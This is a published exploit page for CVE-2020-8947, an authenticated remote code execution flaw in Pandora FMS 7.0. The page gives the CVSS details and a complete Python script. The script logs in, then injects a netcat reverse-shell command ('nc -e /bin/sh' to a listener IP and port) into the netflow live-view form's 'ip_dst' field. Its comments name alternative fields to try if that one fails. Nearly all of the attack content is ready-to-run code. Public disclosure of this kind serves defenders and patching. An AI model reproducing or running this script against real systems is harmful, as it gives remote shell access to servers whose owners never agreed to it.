Pandora FMS 7.0 Authenticated Remote Code Execution

2020.02.14
Credit: Engin Demirbilek
Risk: High
Local: No
Remote: Yes
CVE: CVE-2020-8947
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution # Date: 2020-02-12 # Exploit Author: Engin Demirbilek # Vendor homepage: http://pandorafms.org/ # Version: 7.0 # Software link: https://pandorafms.org/features/free-download-monitoring-software/ # Tested on: CentOS # CVE: CVE-2020-8947 #!/bin/python ''' PANDORAFMS 7.0 Authenticated Remote Code Execution x4 This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS. incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port Author: Engin Demirbilek Github: github.com/EnginDemirbilek CVE: CVE-2020-8947 ''' import requests import sys if len(sys.argv) < 6: print "Usage: ./exploit.py http://url username password listenerIP listenerPort" exit() url = sys.argv[1] user = sys.argv[2] password = sys.argv[3] payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#' login = { 'nick':user, 'pass':password, 'login_button':'Login' } req = requests.Session() print "Sendin login request ..." login = req.post(url+"/pandora_console/index.php?login=1", data=login) payload = { 'date':"", 'time':"", 'period':"", 'interval_length':"", 'chart_type':"", 'max_aggregates':"1", 'address_resolution':"0", 'name':"", 'assign_group':"0", 'filter_type':"0", 'filter_id':"0", 'filter_selected':"0", 'ip_dst':payload, 'ip_src':"", 'dst_port':"", 'src_port':"", 'advanced_filter':"", 'aggregate':"dstip", 'router_ip':"", 'output':"bytes", 'draw_button':"Draw" } print "[+] Sendin exploit ..." exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={ 'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded'}) if exploit.status_code == 200: print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port." else: print "[-] Couldn't send the HTTP request, try again."


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top